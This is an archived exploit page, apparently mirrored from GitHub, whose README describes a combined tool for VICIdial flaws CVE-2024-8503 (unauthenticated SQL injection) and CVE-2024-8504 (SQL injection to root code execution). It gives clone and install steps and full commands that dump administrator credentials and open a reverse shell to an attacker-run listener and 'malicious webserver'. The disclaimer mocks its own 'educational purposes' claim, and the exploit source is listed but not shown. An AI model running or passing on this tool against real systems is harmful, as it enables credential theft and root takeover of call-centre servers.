Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-8504 PoC — VICIdial 安全漏洞

Source
https://github.com/Chocapikk/CVE-2024-8504
Associated Vulnerability
Title:VICIdial 安全漏洞 (CVE-2024-8504)
Description:VICIdial是VICIdial公司的一个软件套件。旨在与 Asterisk 开源 Pbx 电话系统交互,作为一个完整的呼入/呼出联络中心套件,同时支持呼入电子邮件。 VICIdial存在安全漏洞。攻击者利用该漏洞可以以“root”用户身份执行任意shell命令。
Description
VICIdial Unauthenticated SQLi to RCE Exploit (CVE-2024-8503 and CVE-2024-8504)
Readme
# ⚡️ Exploit for CVE-2024-8504 & CVE-2024-8503: SQLi and RCE ⚡️

![Banner](./img/banner.png)
## 🚨 Overview

This repository contains a combined exploit for two critical vulnerabilities discovered in **VICIdial** by **KoreLogic**:
- **CVE-2024-8503**: Unauthenticated SQL Injection (SQLi)
- **CVE-2024-8504**: SQLi leading to Remote Code Execution (RCE)

These vulnerabilities allow an attacker to retrieve administrative credentials through SQLi and ultimately execute arbitrary code on the target server via an RCE attack.

### 🛑 Advisory:

- **Vulnerability Type**: SQL Injection (CVE-2024-8503) and SQLi to RCE (CVE-2024-8504)
- **Affected Software**: VICIdial
- **Severity**: Critical
- **CVE IDs**: 
  - **CVE-2024-8503** (SQLi)
  - **CVE-2024-8504** (SQLi to RCE)

### 🔗 Vulnerability Advisories:
- [CVE-2024-8503 - SQLi Advisory](https://korelogic.com/Resources/Advisories/KL-001-2024-011.txt)
- [CVE-2024-8504 - RCE Advisory](https://korelogic.com/Resources/Advisories/KL-001-2024-012.txt)

## ⚙️ Features

This exploit tool allows you to either:
1. **Retrieve administrator credentials via SQLi** (CVE-2024-8503)
2. **Achieve RCE via SQLi and poisoned recording files** (CVE-2024-8504)

The tool is based on KoreLogic’s original research, with enhancements made to:
- Separate the **SQLi** and **RCE** functionalities for more flexibility.
- Improve the **user experience** by simplifying execution and error handling.
- Provide a cleaner and more **aesthetic output** using `rich_click`.

## 📜 Requirements

To use this exploit, you need:
- Python 3.10+
- A **server** where you can open TWO ports 
- A target server running a vulnerable **VICIdial** instance
- Dependencies installed via `requirements.txt`

## ⚙️ Installation

1. Clone the repository:

```bash
git clone https://github.com/Chocapikk/CVE-2024-8504
cd CVE-2024-8504
```

2. Install the dependencies:

```bash
pip install -r requirements.txt
```

## 🛠️ Usage

### SQLi Mode (Retrieve Admin Credentials)

To perform only the **SQL Injection** attack and retrieve the administrative credentials, use the following command:

```bash
python exploit.py -u https://example.org
```

### RCE Mode (Remote Code Execution)

Once you have the administrator credentials, or if you already know them, you can launch a full RCE attack by running the following command:

```bash
python exploit.py -b -u https://example.org \
            -wh <webserver IP> -wp <webserver port> \
            -lh <your IP> -lp <your listener port>  \
            -un <admin username> -pw <admin password>
```

The `-b` option binds the reverse shell to your listener IP and port. This command will start a **Netcat** listener on the specified port and wait for an incoming reverse shell.

> ⚠️ Replace `<webserver IP>` and `<webserver port>` with the values of your malicious webserver (where you execute the exploit) used to capture the reverse shell or inject payloads.

## 🌐 Usage Example with a server

It’s recommended to use a server where you can open ports to listen for reverse shells. Below are examples for both SQLi and RCE:

### Example for SQLi:

```bash
python exploit.py -u https://example.org
```

### Example for RCE:

```bash
python exploit.py -u https://example.org -wh <server IP> -wp 5000 -lh <server IP> -lp 1337 -un admin -pw password123 -b
```

## ✨ Improvements

- **Separation of vulnerabilities**: The tool clearly separates the execution of the **SQLi** and **RCE** functionalities, making it more flexible for different exploitation scenarios.
- **Cleaner output**: The output is more structured and easy to read, highlighting key steps and results.
- **Bug fixes**: Some bugs from the original exploit have been fixed to ensure smoother execution.

## 📄 Acknowledgements

This exploit is based on the original work by **KoreLogic**, and full credit goes to them for the discovery and initial PoC:
- [CVE-2024-8503 - SQLi Advisory](https://korelogic.com/Resources/Advisories/KL-001-2024-011.txt)
- [CVE-2024-8504 - RCE Advisory](https://korelogic.com/Resources/Advisories/KL-001-2024-012.txt)

Special thanks to KoreLogic for the foundational work. This tool was adapted to improve ease of use, bug fixes, and better separation between the two vulnerabilities.

## 🛡️ Disclaimer

This tool is for **educational purposes** only (lol). Use of this exploit without explicit permission from the system owner is illegal. The author assumes no responsibility for the misuse of this tool.
File Snapshot

 [4.0K]  /data/pocs/8acd28a05d59fe90a7e02eba3578b42a4a9b818a
├── [ 29K]  exploit.py
├── [4.0K]  img
│   └── [ 59K]  banner.png
├── [4.4K]  README.md
└── [  38]  requirements.txt

1 directory, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.